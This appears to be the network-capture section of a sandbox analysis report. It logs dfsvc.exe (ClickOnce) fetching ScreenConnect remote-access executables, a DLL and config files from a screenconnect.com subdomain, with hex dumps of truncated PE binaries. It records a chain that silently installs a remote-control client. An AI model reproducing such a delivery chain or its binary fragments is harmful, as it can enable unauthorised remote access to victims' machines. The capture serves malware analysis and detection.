                                                                                                                                                                                                                                        2024-12-20 17:22:43 UTC13937INData Raw: 3a 97 3a 9c 3a a1 3a bc 3a c9 3a d2 3a d7 3a dc 3a f7 3a 01 3b 0d 3b 12 3b 17 3b 32 3b 3c 3b 48 3b 4d 3b 52 3b 70 3b 7a 3b 86 3b 8b 3b 90 3b b1 3b c1 3b d9 3b 13 3c 23 3c b4 3d a2 3e ac 3e b9 3e ec 3e fe 3e 2e 3f 4b 3f 56 3f a8 3f af 3f c2 3f f2 3f 00 00 00 50 00 00 dc 00 00 00 25 30 38 30 c1 30 f5 31 0b 32 32 32 45 32 61 32 91 32 a0 32 b6 32 cc 32 e3 32 ea 32 f6 32 09 33 0e 33 1a 33 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e
                                                                                                                                                                                                                                        Data Ascii: ::::::::::;;;;2;<;H;M;R;p;z;;;;;;;<#<=>>>>>.?K?V?????P%08001222E2a222222223333033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.549727147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:44 UTC119OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:45 UTC361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 61208
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.WindowsBackstageShell.exe"; filename*=UTF-8''ScreenConnect.WindowsBackstageShell.exe
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:45 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:45 UTC16023INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 41 bc 82 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 5e d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 3b d8 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELA"0^ @ ;@
                                                                                                                                                                                                                                        2024-12-20 17:22:45 UTC16384INData Raw: 00 06 16 ad 04 36 00 1e 23 80 0e 36 00 4b 17 85 0e 36 00 1d 17 85 0e 36 00 6b 23 80 0e 36 00 7d 22 80 0e 36 00 98 22 80 0e 36 00 c7 22 80 0e 36 00 34 23 80 0e 36 00 b8 23 80 0e 36 00 8d 23 80 0e 36 00 77 17 85 0e 36 00 ef 15 ad 04 36 00 d0 15 ad 04 36 00 f7 2a 1e 01 36 00 a9 14 7b 0e 36 00 8f 24 1e 01 36 00 a9 15 ad 04 36 00 6b 0c 1e 01 36 00 ed 14 7b 0e 36 00 72 15 1e 01 36 00 21 2b 1e 01 36 00 a7 17 85 0e 36 00 74 28 8a 0e 36 00 96 28 8a 0e 36 00 89 27 8a 0e 01 00 39 0c 74 0e 16 00 7a 16 8e 0e 16 00 58 0d 96 0e 36 00 6d 08 9e 0e 16 00 36 00 a2 0e 06 00 de 10 31 0a 06 00 60 10 31 0a 06 00 6b 26 8a 0e 06 00 12 1e 77 0e 06 00 31 0f 46 00 06 00 0c 1b ac 0e 06 00 7c 1f b0 0e 06 00 c7 27 b5 0e 06 00 92 18 31 0a 36 00 6d 08 b9 0e 16 00 85 00 be 0e 16 00 b4 00
                                                                                                                                                                                                                                        Data Ascii: 6#6K66k#6}"6"6"64#6#6#6w666*6{6$66k6{6r6!+66t(6(6'9tzX6m61`1k&w1F|'16m
                                                                                                                                                                                                                                        2024-12-20 17:22:45 UTC16384INData Raw: 57 69 64 74 68 00 67 65 74 5f 4c 65 6e 67 74 68 00 45 6e 64 73 57 69 74 68 00 53 74 61 72 74 73 57 69 74 68 00 50 74 72 54 6f 53 74 72 69 6e 67 55 6e 69 00 53 74 72 69 6e 67 54 6f 48 47 6c 6f 62 61 6c 55 6e 69 00 61 64 64 5f 43 6c 69 63 6b 00 50 65 72 66 6f 72 6d 43 6c 69 63 6b 00 4f 6e 43 6c 69 63 6b 00 6f 6e 43 6c 69 63 6b 00 73 65 74 5f 44 6f 63 6b 00 49 53 68 65 6c 6c 4c 69 6e 6b 00 53 68 65 6c 6c 48 6f 6f 6b 00 41 6c 6c 6f 63 48 47 6c 6f 62 61 6c 00 3c 30 3e 5f 5f 46 72 65 65 48 47 6c 6f 62 61 6c 00 67 65 74 5f 56 65 72 74 69 63 61 6c 00 4d 61 72 73 68 61 6c 00 67 65 74 5f 48 6f 72 69 7a 6f 6e 74 61 6c 00 70 69 64 6c 00 73 65 61 72 63 68 42 6f 78 49 6e 70 75 74 4c 65 6e 67 74 68 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 73 65 74 5f 43 61 6e 63 65
                                                                                                                                                                                                                                        Data Ascii: Widthget_LengthEndsWithStartsWithPtrToStringUniStringToHGlobalUniadd_ClickPerformClickOnClickonClickset_DockIShellLinkShellHookAllocHGlobal<0>__FreeHGlobalget_VerticalMarshalget_HorizontalpidlsearchBoxInputLengthThresholdLabelset_Cance
                                                                                                                                                                                                                                        2024-12-20 17:22:45 UTC12417INData Raw: 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 28 00 02 00 01 00 4c 00 65 00 67 00 61 00 6c 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 20 00 00 00 78 00 28 00 01 00 4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00
                                                                                                                                                                                                                                        Data Ascii: ndowsBackstageShell.exe(LegalCopyright x(OriginalFilenameScreenConnect.WindowsBackstageShell.exe<ProductNameScreenC


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.549728147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:47 UTC123OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:47 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.WindowsFileManager.exe.config"; filename*=UTF-8''ScreenConnect.WindowsFileManager.exe.config
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:47 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:47 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.549735147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:49 UTC118OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:49 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.WindowsClient.exe.config"; filename*=UTF-8''ScreenConnect.WindowsClient.exe.config
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:48 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:49 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.549742147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:51 UTC126OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:51 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.WindowsBackstageShell.exe.config"; filename*=UTF-8''ScreenConnect.WindowsBackstageShell.exe.config
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:50 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:51 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.549750147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:52 UTC116OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC355INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 81688
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.WindowsFileManager.exe"; filename*=UTF-8''ScreenConnect.WindowsFileManager.exe
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:52 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC16029INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d3 2a f6 b1 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 85 e7 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*"0@^ `@ `@
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC16384INData Raw: 43 6f 6e 6e 65 63 74 2e 46 69 6c 65 4f 70 65 6e 44 69 61 6c 6f 67 43 6c 61 73 73 00 00 08 01 00 01 00 00 00 00 00 29 01 00 24 33 36 31 31 36 36 34 32 2d 64 37 31 33 2d 34 62 39 37 2d 39 62 38 33 2d 37 34 38 34 61 39 64 30 30 34 33 33 00 00 29 01 00 24 38 30 31 36 62 37 62 33 2d 33 64 34 39 2d 34 35 30 34 2d 61 30 61 61 2d 32 61 33 37 34 39 34 65 36 30 36 66 00 00 29 01 00 24 39 37 33 35 31 30 64 62 2d 37 64 37 66 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 2d 58 83 23 78 e3 00 90 e6 11 a4 11 3b 47 7d 1a 6d fb e6 06 2a 14 21 4c d2 1d 8b a7 f3 06 83 c0 73 ea f6 ef d6 e5 4d 3f 80 af ed f6 fd 14 75 8f 6c 02 17 ff 0e e6 57 bc b9 64 0b b2
                                                                                                                                                                                                                                        Data Ascii: Connect.FileOpenDialogClass)$36116642-d713-4b97-9b83-7484a9d00433)$8016b7b3-3d49-4504-a0aa-2a37494e606f)$973510db-7d7f-452b-8975-74a85828d354TextState-X#x;G}m*!LsM?ulWd
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC16384INData Raw: 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4b bc e4 ff 4d c2 eb ff 4e c6 f0 ff 50 c9 f4 ff 51 cc f8 ff 52 ce fa ff 53 d0 fd ff 54 d1 fe ff 54 d2 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff
                                                                                                                                                                                                                                        Data Ascii: ::::::::::::::::::::::::::KMNPQRSTTUUTSRQPNL::::::::::::
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC16384INData Raw: d7 ff ff 65 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff
                                                                                                                                                                                                                                        Data Ascii: effffffffffffffffffffffffffffffffffffffffffgggggggg
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC16384INData Raw: d8 ff ff 69 d8 ff ff 69 d8 ff ff 69 d8 ff ff 69 d8 ff ff 69 d8 ff ff 00 00 00 00 00 00 00 00 00 91 d6 ff 00 91 d6 ff 00 91 d6 ff 00 91 d6 ff 00 91 d6 ff 00 91 d6 ff 00 91 d6 ff 00 91 d6 ff 22 a3 de ff 68 c8 f0 ff 79 dd ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 6b d9 ff ff 75 db ff ff 00 00 00 00 00 00 00 00 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff
                                                                                                                                                                                                                                        Data Ascii: iiiii"hykkkkkkkkkkun
                                                                                                                                                                                                                                        2024-12-20 17:22:53 UTC123INData Raw: 28 a8 ef 3f 45 f4 3f 2e e2 a8 33 37 d4 c3 5a c1 ae 8a 45 9e 33 dc af 58 29 1c e3 bd 5c e8 e1 89 48 87 60 c7 fc 4f de 71 7c 38 7a 4a 08 82 8b 4b e2 ec c1 0b 85 23 d5 96 e0 ed 09 6e 9b a2 3b 80 61 03 df e7 7c e1 f1 59 b0 43 4a d9 10 3b 39 a3 37 f5 8e 29 39 00 a6 69 a5 26 1e 8e e8 cd 0c 6b 85 65 a2 12 e7 e0 1c 06 be 63 ec 03 f8 14 72 8c 3e a0 d3 6e a1 6e 33 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: (?E?.37ZE3X)\H`Oq|8zJK#n;a|YCJ;97)9i&kecr>nn3


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        8192.168.2.549756147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:55 UTC104OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 197120
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.Client.dll"; filename*=UTF-8''ScreenConnect.Client.dll
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:55 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16052INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 18 0a ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 96 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 6a 7b 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0 `j{@
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 03 28 f3 02 00 06 2a 46 28 81 00 00 0a 02 7b c6 00 00 04 6f 82 00 00 0a 2a 5e 03 75 76 00 00 02 2c 0d 02 03 a5 76 00 00 02 28 f3 02 00 06 2a 16 2a 5e 28 81 00 00 0a 02 7b c6 00 00 04 03 7b c6 00 00 04 6f 84 00 00 0a 2a 36 03 02 28 eb 02 00 06 81 1b 00 00 01 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 8f 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00
                                                                                                                                                                                                                                        Data Ascii: (*F({o*^uv,v(**^({{o*6(*0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rY
